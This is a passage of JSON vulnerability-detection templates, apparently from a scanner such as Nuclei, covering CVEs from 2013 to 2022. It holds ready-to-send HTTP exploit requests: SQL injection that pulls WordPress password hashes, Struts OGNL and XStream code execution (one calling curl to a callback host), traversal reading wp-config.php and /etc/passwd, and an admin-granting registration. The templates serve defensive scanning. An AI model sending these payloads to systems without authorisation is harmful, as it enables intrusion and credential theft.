\"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-25568","info":{"name":"MotionEye Config Info Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["upload_password","network_password"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44957","info":{"name":"WebTareas 2.4p5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","GET /clients/editclient.php? HTTP/1.1\nHost: {{Hostname}}\n","POST /clients/editclient.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"csrfToken\"\n\n{{csrf}}\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"action\"\n\nadd\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cown\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cn\"\n\n{{randstr}}<details/open/ontoggle=alert(document.domain)>\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"add\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"zip\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ct\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cou\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wp\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"fa\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"url\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"email\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"curr\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wc\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pym\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pyt\"\n\n7\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"c\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ssc\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"file1\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"attnam1\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"atttmp1\"\n\n\n-----------------------------34025600472463336623659912061--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<details/open/ontoggle=alert(document.domain)>","clients/listclients.php?"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0814","info":{"name":"Ubigeo de Peru < 3.6.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["idProv","idDist","distrito"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END CERTIFICATE","kubernetes.io"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Uploader","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["traffic analy","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Category Grid View Gallery ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Duplicator - WordPress Migration"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Visualizer","Tested up to:"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" 